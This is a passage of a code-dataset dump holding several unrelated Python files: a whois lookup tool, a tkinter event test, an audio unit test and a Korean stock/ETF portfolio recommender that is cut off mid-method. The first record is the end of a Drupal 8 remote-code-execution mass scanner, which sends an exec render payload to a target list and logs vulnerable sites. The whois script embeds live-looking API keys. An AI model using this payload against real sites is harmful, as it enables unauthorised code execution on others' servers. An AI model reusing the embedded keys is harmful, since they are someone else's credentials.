mode='r').readlines()]\nexcept IndexError:\n exit('noob: pd.py list.txt')\n\ndef chips(yeah):\n try:\n url = yeah + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'\n kelosex = {\"form_id\": \"user_register_form\", \"_drupal_ajax\": \"1\", \"mail[#post_render][]\": \"exec\", \"mail[#type]\": \"markup\", \"mail[#markup]\": \"echo omelette\"}\n if 'omelette' in requests.post(url, data=kelosex, verify=False).text:\n open(\"lacoste\",\"a\").write(yeah+\"/\\n\")\n print(yeah, \" -> Vuln frr\")\n else:\n print(yeah, \" -> Nan\") \n except:\n pass\n\nmp = Pool(100)\nmp.map(chips, 
target)\nmp.close()\nmp.join()\n","sub_path":"Drupal/Mass-Exploit-RCE-8x.py","file_name":"Mass-Exploit-RCE-8x.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"28462611","text":"import unittest\nfrom os import path, getcwd\nfrom time import sleep\n\nfrom modules.audio import Audio\n\n\nclass AudioTest(unittest.TestCase):\n def test_audio(self):\n filepath = path.join(getcwd(), \"test.mp3\")\n test = Audio(filepath)\n test.play()\n sleep(1)\n self.assertEqual(test.playing, True)\n test.stop()\n sleep(1)\n self.assertEqual(test.playing, False)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"283524878","text":"# coding: utf-8\nimport sys #Importation de sys\nimport os\nimport requests #Importation de request, sinon bah j'peux pas faire de requête vers l'API ^^\n\n\n\n#Petite bannière pour faire classe\ndef banner():\n os.system('cls')\n print('''\n\n\n ██╗ ██╗██╗ ██╗ ██████╗ ██╗███████╗\n ██║ ██║██║ ██║██╔═══██╗██║██╔════╝\n ██║ █╗ ██║███████║██║ ██║██║███████╗\n ██║███╗██║██╔══██║██║ ██║██║╚════██║\n ╚███╔███╔╝██║ ██║╚██████╔╝██║███████║\n ╚══╝╚══╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝╚══════╝\n Author -> Mizaru/Yaniss \n @sMizaru https://github.com/sMizaru \n\n\n ''')\n \n#L'API n'est pas au point\n#def googlemaps(loc):\n# URL = \"http://maps.googleapis.com/maps/api/geocode/json\"\n# rq = requests.get(URL, dict(address=loc, key='AIzaSyDFeso0skYK4ZAb-qLHhyNESp7CHdgG33U'))\n# if rq.status_code == 200:\n# data = rq.json() \n# latitude = data['results'][0]['geometry']['location']['lat'] \n# longitude = data['results'][0]['geometry']['location']['lng'] \n# formatted_address = data['results'][0]['formatted_address']\n# print(\"Latitude -> %s\" % latitude)\n# print(\"Longitude -> %s\" % longitude)\n# print('Adresse -> %s' % formatted_address)\n# else:\n# raise Exception('lol, je crois que jai reçu un code de status inconnu %d' % rq.status_code) #Si la reponse contient un status autre que 200 (success)\n# sys.exit(1)\n\n\n#Création de la requête vers l'API\ndef request(domain, apikey):\n\n r = requests.get('http://api.whoapi.com/', dict(domain=domain, r='whois', apikey=apikey)) #Initialisation de la requête GET vers l'API (get > post c'est tout)\n if r.status_code == 200:\n json = r.json()\n if int(json['status']) == 0:\n nameserver = json['nameservers']\n whois_name = json['whois_name']\n info = json['contacts']\n organization = json['contacts'][0]['organization']\n email = json['contacts'][0]['email']\n phone = json['contacts'][0]['phone']\n domain_name = json['domain_name']\n address = json['contacts'][0]['full_address']\n if not email:\n print('Nom -> %s' % whois_name)\n print('Informations sur le propriétaire -> %s' % info)\n print('Nom de domaine -> %s' % domain_name)\n print('Entreprise -> %s' % organization)\n print(\"Il n'y a pas d'adresse e-mail spécifiée\")\n print('Nameservers -> %s' % nameserver)\n print('Adresse -> %s' % address)\n #googlemaps(address)\n else:\n print('Nom -> %s' % whois_name)\n print('Informations sur le propriétaire -> %s' % info)\n print('Nom de domaine -> %s' % domain_name)\n print('Entreprise -> %s' % organization)\n print('Adresse e-mail -> %s' % email)\n print('Nameservers -> %s' % nameserver)\n print('Adresse -> %s' % address)\n #googlemaps(address)\n else:\n raise 
Exception(json['status_desc'])\n sys.exit(1)\n else:\n raise Exception('lol, je crois que jai reçu un code de status inconnu %d' % r.status_code) #Si la reponse contient un status autre que 200 (success)\n sys.exit(1)\n\n\n#Creation de \"main\"\ndef main():\n host = input('Quel est le domaine que tu veux whois ? Dit-moi tout -> ')\n target = str(host)\n request(target, 'b8453d3125f32d3042b11ebc2502aad0') #Le programme effectuera une requête vers le domaine qu'on aura precisé\n\nif __name__ == \"__main__\":\n banner()\n main() #appel vers la fonction main\n\n","sub_path":"whois.py","file_name":"whois.py","file_ext":"py","file_size_in_byte":4060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"267288601","text":"import tkinter as tk\nimport time\n\n'''Константы'''\nWIDTH = 800\nHIGHT = 600\n\nroot = tk.Tk()\nfr = tk.Frame(root)\nroot.geometry(str(WIDTH) + 'x' + str(HIGHT))\ncanv = tk.Canvas(root, bg='white')\ncanv.pack(fill=tk.BOTH, expand=1)\nbutton_state = 0\n\ndef motion_move(event):\n print(event.x)\n\ndef press_button(event):\n global button_state\n button_state = 1\n index = 0\n while button_state:\n canv.update()\n index += 1\n print('press_button=', button_state, 'Время ожидание событие release_button=', index )\n time.sleep(1)\n\ndef release_button(event):\n global button_state\n button_state = 0\n print('release_button=', button_state)\n\ncanv.bind('<Motion>', motion_move)\ncanv.bind('<ButtonPress-1>', press_button)\ncanv.bind('<ButtonRelease-1>', release_button)\n\ntk.mainloop()","sub_path":"python_practice_2020/Lab_8/event_test.py","file_name":"event_test.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"102807955","text":"import pandas as pd\nimport numpy as np\nimport os\nfrom datetime import date\nimport time\nfrom tqdm import tqdm\n\nimport matplotlib.font_manager as fm\nimport matplotlib.pylab as plt\nimport matplotlib\n\nimport ipywidgets as widgets\nfrom ipywidgets import interact\nfrom PIL import Image, ImageFont, ImageDraw\nfrom IPython.display import clear_output\nfrom IPython.display import Image as disImage\nfrom IPython.display import display\n\nfrom .scraper import Scraper\nfrom .indicator import Indicator\nfrom .recommender import Recommender\n\n\nclass RED:\n def __init__(self):\n self.path = os.getcwd()\n self.stock_path = os.path.join(self.path, \"data/stock\")\n self.etf_path = os.path.join(self.path, \"data/etf\")\n self.users_path = os.path.join(self.path, \"data/users\")\n if not os.path.isdir(self.stock_path):\n os.makedirs(self.stock_path)\n if not os.path.isdir(self.etf_path):\n os.makedirs(self.etf_path)\n if not os.path.isdir(self.users_path):\n os.makedirs(self.users_path)\n\n try:\n self.total_info = pd.read_csv(\n self.path + \"/data/users/userDB.csv\", encoding=\"cp949\", index_col=0\n )\n except FileNotFoundError:\n print('\"userDB.csv\" 파일을 찾을 수 없습니다. 
먼저 userDB를 생성하겠습니다.')\n df = pd.DataFrame(\n columns=(\n \"투자 금액(만 원)\",\n \"투자 기간\",\n \"나이\",\n \"성별\",\n \"월 정기 수입(만 원)\",\n \"관심산업분야\",\n \"금융지식수준\",\n \"위험추구성향\",\n \"주식\",\n \"채권\",\n \"ETF\",\n \"날짜\",\n )\n )\n df.to_csv(self.path + \"/data/users/userDB.csv\", encoding=\"cp949\")\n self.total_info = pd.read_csv(\n self.path + \"/data/users/userDB.csv\", encoding=\"cp949\", index_col=0\n )\n\n self.stock_data = os.listdir(self.path + \"/data/stock\")\n self.etf_data = os.listdir(self.path + \"/data/etf\")\n self.start = widgets.Button(description=\"투자 시작\")\n self.to_home_button = widgets.Button(description=\"뒤로 가기\")\n self.crawl_setting = widgets.Button(description=\"데이터 업데이트\")\n self.save = widgets.Button(description=\"결과 저장\")\n self.fontpath = self.path + \"/red/interface/font/NanumSquareB.ttf\"\n\n def RED_start(self, change):\n \"\"\" \"투자 시작\" 클릭시 다른 모든 함수들이 실행될 주요함수\"\"\"\n self.user_info = [\n RED.capital.value,\n RED.term_dropdown.value,\n RED.age.value,\n RED.gender_dropdown.value,\n RED.income.value,\n RED.sector.value,\n RED.know.value,\n RED.risk.value,\n ]\n clear_output()\n\n print(\"입력이 완료되었습니다, 투자자 성향을 판단중입니다\")\n print(\"···\")\n time.sleep(1.5)\n\n self.disposition_viz()\n # 성향을 보고 자본배분 비율 선정\n # 각각 추천 -> 주식: 기간, 알고리즘 고려 / etf: 기간, 수익률, 관심분야 고려\n self.portfolios = self.mk_portfolio()\n # 추천 결과 출력 후 DB 만들고 저장.\n display(self.save)\n self.save.on_click(self.save_info)\n\n def save_info(self, portfolios):\n df = pd.DataFrame(\n np.array(self.user_info).reshape(1, 8),\n columns=[\n \"투자 금액(만 원)\",\n \"투자 기간\",\n \"나이\",\n \"성별\",\n \"월 정기 수입(만 원)\",\n \"관심산업분야\",\n \"금융지식수준\",\n \"위험추구성향\",\n ],\n )\n\n df[\"주식\"] = [list(self.portfolios[0].items())]\n df[\"채권\"] = [list(self.portfolios[1].items())]\n df[\"ETF\"] = [list(self.portfolios[2].items())]\n df[\"날짜\"] = date.today()\n df = pd.concat([self.total_info, df], ignore_index=True)\n df.to_csv(self.path + \"/data/users/userDB.csv\", encoding=\"cp949\")\n print(\"저장되었습니다.\")\n\n def mk_portfolio(self):\n \"\"\"포트폴리오 만드는 함수, r1: ETF비율, r2 : 채권 비율\"\"\"\n capital = self.user_info[0] * 10000\n if self.user_info[7] == self.risk_list[0]:\n r1 = 1\n r2 = 0.67\n elif self.user_info[7] == self.risk_list[1]:\n r1 = 0.8\n r2 = 0.4\n elif self.user_info[7] == self.risk_list[2]:\n r1 = 0.6\n r2 = 0.3\n elif self.user_info[7] == self.risk_list[3]:\n r1 = 0.4\n r2 = 0.1\n elif self.user_info[7] == self.risk_list[4]:\n r1 = 0.2\n r2 = 0\n\n if self.user_info[1] == self.term_list[0] or self.user_info[1] == self.term_list[1]:\n r2 = 0 # 투자 기간이 짧으면 채권 제외\n\n real_r0 = int((1 - r1) * 100)\n real_r1 = int((r1 - r2) * 100)\n real_r2 = int(r2 * 100)\n\n recommender = Recommender(self.path, self.stock_path, self.etf_path, self.user_info[5])\n \n recommender.cal_weight()\n rec_stock_lst = recommender.rec_stock()\n \n df = pd.read_csv(self.path + \"/data/stock_list2.csv\", encoding = 'cp949')\n names = [i[0] for i in rec_stock_lst]\n a = list(df[df['종목명'].isin(names)][['종목명','가중치']].sort_values(by=\"가중치\",ascending = False).종목명.values)\n rec_stock_lst.sort(key=lambda x: a.index(x[0]))\n #print(rec_stock_lst)\n \n # 중복의 경우 처리필요\n \n res_etf1, res_etf2 = recommender.rec_etf()\n print(\"\\n\\n고객님의 포트폴리오입니다.\\n\")\n \n 주식리스트 = []\n 채권리스트 = []\n 일반리스트 = []\n\n 주식별금액리스트 = []\n 채권별금액리스트 = []\n 일반별금액리스트 = []\n\n self.portfolios1, penny1 = self.dist(capital, rec_stock_lst, 1 - (r1), 10)\n print(\"\\n주식 종목 : {}원\\n\".format(capital * (1 - r1) - penny1))\n for name, info in self.portfolios1.items():\n print(\"{}, {}개 매입. {} 전략. 
현재가: {}\".format(name, info[0], info[1][1], info[1][0]))\n 주식리스트.append(name)\n 주식별금액리스트.append(info[1])\n\n self.portfolios2, penny2 = self.dist(capital + penny1, res_etf1, r2, 5)\n print(\"\\n채권 ETF 종목 : {}원\\n\".format((capital + penny1) * r2 - penny2))\n for name, info in self.portfolios2.items():\n print(\"{}, {}개 매입.기간 내 보유 권장. 현재가: {}\".format(name, info[0], info[1][0]))\n 채권리스트.append(name)\n 채권별금액리스트.append(info[1])\n\n self.portfolios3, penny3 = self.dist(capital + penny2, res_etf2, r1 - r2, 5)\n print(\"\\n일반 ETF 종목 : {}원\\n\".format((capital + penny2) * (r1 - r2) - penny3))\n for name, info in self.portfolios3.items():\n print(\"{}, {}개 매입. 20일 후 리밸런싱 권장. 현재가: {}\".format(name, info[0], info[1][0]))\n 일반리스트.append(name)\n 채권별금액리스트.append(info[1])\n \n # 포트폴리오 1번 보여주기\n self.portfolio_viz()\n\n ## 포트폴리오 상세정보\n 주식금액 = capital * (1 - r1) - penny1\n 채권금액 = (capital + penny1) * r2 - penny2\n 일반금액 = (capital + penny2) * (r1 - r2) - penny3\n\n # 막대 그래프 생성\n kindx = [\"주식\", \"일반 ETF\", \"채권 ETF\"]\n values = [주식금액, 일반금액, 채권금액]\n colors = [\"silver\", \"gold\", \"lightgray\"]\n\n fm.get_fontconfig_fonts()\n font_name = fm.FontProperties(fname=self.fontpath).get_name()\n plt.rc(\"font\", family= font_name, size=20)\n \n\n fig = plt.figure(figsize=(7, 7))\n plt.bar(kindx, values, width=0.6, color=colors, edgecolor=\"lightgray\")\n\n plt.savefig(self.path + \"/red/interface/image/portfolio/bar_chart.png\")\n plt.close()\n\n # 경로별 이미지 불러오기\n im_tend = Image.open(self.path + \"/red/interface/image/portfolio/red_3.png\")\n im_chart = Image.open(self.path + \"/red/interface/image/portfolio/bar_chart.png\")\n font = ImageFont.truetype(self.fontpath, 24)\n\n # 칼라 설정\n b, g, r, a = 0, 0, 0, 0\n\n # 이미지에 텍스트 삽입\n draw = ImageDraw.Draw(im_tend)\n \n if real_r0 == 80: # 80 : 20 : 00\n try : \n draw.text((635, 120), str(주식리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try :\n draw.text((635, 164.333), str(주식리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try :\n draw.text((635, 208.666), str(주식리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try :\n draw.text((635, 253), str(주식리스트[3]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try :\n draw.text((635, 297.333), str(주식리스트[4]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try :\n draw.text((635, 341.666), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try :\n draw.text((635, 386), str(일반리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try :\n draw.text((805, 430.333), \"···\", font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n elif real_r0 == 60: # 60 : 30 : 10\n if real_r2 == 0:\n try: \n draw.text((635, 120), str(주식리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 164.333), str(주식리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 208.666), str(주식리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 253), str(주식리스트[3]), font=font, fill=(b, g, r, a))\n except : \n 
draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 297.333), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 341.666), str(일반리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 386), str(일반리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((805, 430.333), \"···\", font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n else:\n try : \n draw.text((635, 120), str(주식리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 164.333), str(주식리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 208.666), str(주식리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 253), str(주식리스트[3]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 297.333), str(채권리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 341.666), str(채권리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 386), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((805, 430.333), \"···\", font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n elif real_r0 == 40: # 40 : 30 : 30\n if real_r2 == 0:\n try : \n draw.text((635, 120), str(주식리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 164.333), str(주식리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 208.666), str(주식리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 253), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 297.333), str(일반리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 341.666), str(일반리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 386), str(일반리스트[3]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((805, 430.333), \"···\", font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n else:\n try : \n draw.text((635, 120), str(주식리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 164.333), str(주식리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 208.666), str(주식리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 253), str(채권리스트[0]), font=font, fill=(b, g, r, 
a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 297.333), str(채권리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 341.666), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 386), str(일반리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((805, 430.333), \"···\", font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n elif real_r0 == 19: # 19 : 40 : 40\n if real_r2 == 0:\n try : \n draw.text((635, 120), str(주식리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 164.333), str(주식리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 208.666), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 253), str(일반리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 297.333), str(일반리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 341.666), str(일반리스트[3]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 386), str(일반리스트[4]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((805, 430.333), \"···\", font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n else:\n try : \n draw.text((635, 120), str(주식리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 164.333), str(주식리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 208.666), str(채권리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 253), str(채권리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 297.333), str(채권리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 341.666), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 386), str(일반리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((805, 430.333), \"···\", font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n elif real_r0 == 0: # 0 : 33 : 67\n if real_r2 == 0:\n try : \n draw.text((635, 120), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 164.333), str(일반리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 208.666), str(일반리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n 
draw.text((635, 253), str(일반리스트[3]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 297.333), str(일반리스트[4]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n else:\n try : \n draw.text((635, 120), str(채권리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 164.333), str(채권리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 208.666), str(채권리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 253), str(일반리스트[0]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 297.333), str(일반리스트[1]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 341.666), str(일반리스트[2]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((635, 386), str(일반리스트[3]), font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n try : \n draw.text((805, 430.333), \"···\", font=font, fill=(b, g, r, a))\n except : \n draw.text((0, 0), '', font=font, fill=(b, g, r, a))\n \n\n # 이미지에 파이차트 삽입\n im_tend.paste(im_chart, (30, 10))\n\n display(im_tend)\n\n # 마무리\n #portfolios4 = dict(portfolios1, **portfolios2)\n #portfolios4.update(portfolios3)\n return self.portfolios1,self.portfolios2,self.portfolios3\n\n def dist(self, capital, asset, pro, max_num):\n \"\"\"자본 배분 알고리즘 (자본, 리스트, 비율, 최대종류)\"\"\"\n limit = capital * pro # 최대 금액\n amount = 0 # 금액\n res = dict() # 포트폴리오\n\n while True:\n more = False # 더 넣을 값이 있는가?\n for i in range(len(asset)):\n if len(res) >= max_num and asset[i][0] not in res: # 최대 종류 수까지 담았다면\n break\n if limit >= amount + asset[i][1]: # 최대금액 미만이라면\n amount += asset[i][1]\n res.setdefault(asset[i][0], [0, asset[i][1:]])\n res[asset[i][0]][0] += 1\n more = True\n\n # 더 못 넣는다면\n if more == False:\n break\n # print(\"배분가능 금액 : \",limit,\"실제 배분금액 : \", amount)\n return res, limit - amount\n\n def data_setting(self, change): # 실시간 종목추천을 위한 최근 데이터 크롤링 및 전처리\n print(\"실시간 주가 데이터를 불러오는 중입니다... 
(약 5분~8분 소요)\")\n self.crawling_start()\n print(\"데이터를 처리합니다.\")\n time.sleep(1)\n self.preprocess_start()\n\n def clear_all(self, change):\n clear_output() # \"뒤로 가기\" 클릭시 인터페이스 종료\n\n def run(self): # 인터페이스 및 프로그램 실행\n\n for i in self.user_buttons:\n display(i)\n\n display(self.crawl_setting)\n display(self.start)\n display(self.to_home_button)\n print(\"데이터 업데이트를 하신 후, 입력하신 정보를 확인하시고 투자 시작을 눌러주세요.\")\n self.start.on_click(self.RED_start)\n self.to_home_button.on_click(self.clear_all)\n self.crawl_setting.on_click(self.data_setting)\n\n def crawling_start(self):\n scraper = Scraper()\n scraper.runAll()\n\n def preprocess_start(self):\n for i in tqdm(os.listdir(self.path + \"/data/stock\")):\n data_dir = self.path + \"/data/stock/\" + i\n stock_df = pd.read_csv(data_dir, index_col=0, encoding=\"cp949\")\n stock_preprocess = Indicator(stock_df)\n stock_preprocess.runAll()\n stock_df.to_csv(data_dir, encoding=\"cp949\")\n\n for i in tqdm(os.listdir(self.path + \"/data/etf\")):\n data_dir = self.path + \"/data/etf/\" + i\n etf_df = pd.read_csv(data_dir, index_col=0, encoding=\"cp949\")\n etf_preprocess = Indicator(etf_df)\n etf_preprocess.runAll()\n etf_df.to_csv(data_dir, encoding=\"cp949\")\n print(\"데이터 업데이트가 완료되었습니다.\")\n\n term_list = [\"1주 ~ 1개월\", \"1개월 ~ 6개월\", \"6개월 ~ 1년\", \"1년 이상\"]\n sector_list = ['건설','금융','기계','IT','운수창고','운수장비',\n '유통','의약','전기전자','철강금속','화학', '통신', '상관없음']\n know_list = [\n \"금융투자상품에 투자해 본 경험이 없음\",\n \"널리 알려진 금융투자 상품(주식, 채권 및 펀드 등)의 구조 및 위험을 일정 부분 이해하고 있음\",\n \"널리 알려진 금융투자 상품(주식, 채권 및 펀드 등)의 구조 및 위험을 깊이 있게 이해하고 있음\",\n \"파생상품을 포함한 대부분의 금융투자상품의 구조 및 위험을 이해하고 있음\",\n ]\n risk_list = [\n \"예금 또는 적금 수준의 수익률을 기대 / 투자원금의 손실을 원하지 않음\",\n \"투자원금의 손실 위험을 최소화하고, 안정적인 투자를 목표 / 예금ㆍ적금보다 높은 수익을 위해 단기적인 손실정도는 수용할 수 있고, 자산 중 일부를 위험자산에 투자할 의향이 있음\",\n \"예금ㆍ적금보다 높은 수익을 기대할 수 있다면 위험을 감수하고 투자할 의향이 있음\",\n \"투자원금의 보전보다 수익을 추구 / 투자자금의 대부분을 주식, 옵션 등의 위험자산에 투자할 의향이 있음\",\n \"시장 평균 수익률을 넘어서는 높은 수준의 투자 수익 추구 / 투자자금의 대부분을 주식, 옵션 등의 위험자산에투자할 의향이 있음\",\n ]\n\n style = {\"description_width\": \"initial\"}\n\n capital = widgets.BoundedIntText(\n min=1,\n max=10000,\n value=300,\n continuous_update=True,\n description=\"투자 금액(만 원)\",\n disabled=False,\n style=style,\n )\n term_dropdown = widgets.Dropdown(\n description=\"투자 기간 \", options=term_list, disabled=False, style=style\n )\n\n age = widgets.BoundedIntText(\n min=10, max=100, value=20, disabled=False, description=\"나이 (만)\", style=style\n )\n gender_dropdown = widgets.Dropdown(\n description=\"성별 \", options=[\"남\", \"여\"], disabled=False, style=style\n )\n\n income = widgets.FloatText(\n value=100, continuous_update=True, description=\"월 정기 수입(만 원)\", disabled=False, style=style\n )\n\n sector = widgets.Dropdown(\n options=sector_list,\n description=\"관심산업분야\",\n disabled=False,\n continuous_update=False,\n layout={\"width\": \"max-content\"},\n readout=True,\n style=style,\n )\n know = widgets.Dropdown(\n options=know_list,\n description=\"금융지식수준\",\n disabled=False,\n continuous_update=False,\n layout={\"width\": \"max-content\"},\n readout=True,\n style=style,\n )\n risk = widgets.Dropdown(\n options=risk_list,\n description=\"위험추구성향\",\n disabled=False,\n continuous_update=False,\n layout={\"width\": \"max-content\"},\n readout=True,\n style=style,\n )\n user_buttons = [capital, term_dropdown, age, gender_dropdown, income, sector, know, risk]\n\n def disposition_viz(self): # 투자 성향 시각화 및 정보확인\n\n # 경로\n folder_path = [\"age/age_\", \"period/\", \"sex/\", \"tend/\"]\n extension_path = \".png\"\n\n # 투자성향 파일명\n if 
